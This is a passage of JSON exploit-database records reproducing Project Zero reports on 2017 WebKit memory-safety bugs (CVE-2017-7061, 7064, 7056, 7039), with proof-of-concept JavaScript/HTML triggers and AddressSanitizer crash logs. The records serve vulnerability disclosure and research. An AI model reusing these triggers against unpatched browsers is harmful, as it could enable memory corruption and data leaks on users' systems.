0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\nShadow bytes around the buggy address:\r\n 0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==728==ABORTING\r\n-->\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28181"}, {"lastseen": "2018-04-14T15:45:37", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-09-12T00:00:00", "type": "zdt", "title": "WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "href": "https://0day.today/exploit/description/28492", "id": "1337DAY-ID-28492", "sourceData": "WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal \r\n\r\nCVE-2017-7061\r\n\r\n\r\nLet's start with JS code.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n\r\nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string(\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case which cause a type confusion.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n\r\nPoC:\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: lokihardt\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/28492", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-26T23:07:25", "description": "WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.", "edition": 1, "published": "2017-07-25T00:00:00", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28183", "id": "1337DAY-ID-28183", "sourceData": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \r\n\r\nCVE-2017-7064\r\n\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28183"}, {"lastseen": "2018-03-12T17:13:02", "description": "WebKit JSC suffers from incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform.", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28187", "id": "1337DAY-ID-28187", "sourceData": "WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform \r\n\r\nCVE-2017-7056\r\n\r\n\r\nHere is a snippet of ArgumentsEliminationPhase::transform\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\nPoC:\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\n\n# 0day.today [2018-03-12] #", "sourceHref": "https://0day.today/exploit/28187", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T11:05:24", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "type": "zdt", "title": "WebKit - WebCore::Node::nextSibling Use-After-Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28179", "id": "1337DAY-ID-28179", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241\r\n \r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n #24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)\r\n #25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)\r\n #26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)\r\n #27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)\r\n #28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)\r\n #29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)\r\n #30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)\r\n #31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)\r\n #32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)\r\n #33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)\r\n #34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)\r\n #35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) 